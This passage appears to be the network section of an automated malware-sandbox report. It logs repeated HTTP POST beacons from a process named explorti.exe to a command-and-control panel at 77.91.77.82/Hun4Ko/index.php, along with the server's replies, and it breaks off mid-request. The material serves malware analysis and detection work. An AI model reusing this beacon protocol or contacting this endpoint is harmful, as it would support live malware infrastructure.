                                                                71192.168.2.64979977.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:43.023694038 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:43.709501982 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                72192.168.2.64980077.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:43.718136072 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:44.433881998 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                73192.168.2.64980177.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:44.555574894 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:45.251692057 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                74192.168.2.64980277.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:45.261115074 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:45.940557957 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                75192.168.2.64980377.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:46.057909966 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:46.736747980 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:46 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                76192.168.2.64980477.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:46.751538992 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:47.475090027 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                77192.168.2.64980577.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:47.586425066 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:48.289243937 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                78192.168.2.64980677.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:48.298333883 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:49.006681919 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                79192.168.2.64980777.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:49.119259119 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:49.798993111 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                80192.168.2.64980877.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:49.809591055 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:50.503118992 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                81192.168.2.64981077.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:50.649600029 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:51.325709105 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                82192.168.2.64981177.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:51.341310024 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:52.055053949 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                83192.168.2.64981277.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:52.181128979 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:52.856702089 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                84192.168.2.64981377.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:52.869369984 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:53.592888117 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                85192.168.2.64981477.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:53.714144945 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:54.398621082 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                86192.168.2.64981577.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:54.408502102 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:55.087243080 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                87192.168.2.64981677.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:55.211667061 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:55.894499063 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                88192.168.2.64981777.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:55.904335022 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:56.595387936 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                89192.168.2.64981877.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:56.729664087 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:57.408189058 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                90192.168.2.64981977.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:57.420891047 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:58.144654036 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                91192.168.2.64982077.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:58.257594109 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:58.937751055 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                92192.168.2.64982177.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:58.947698116 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
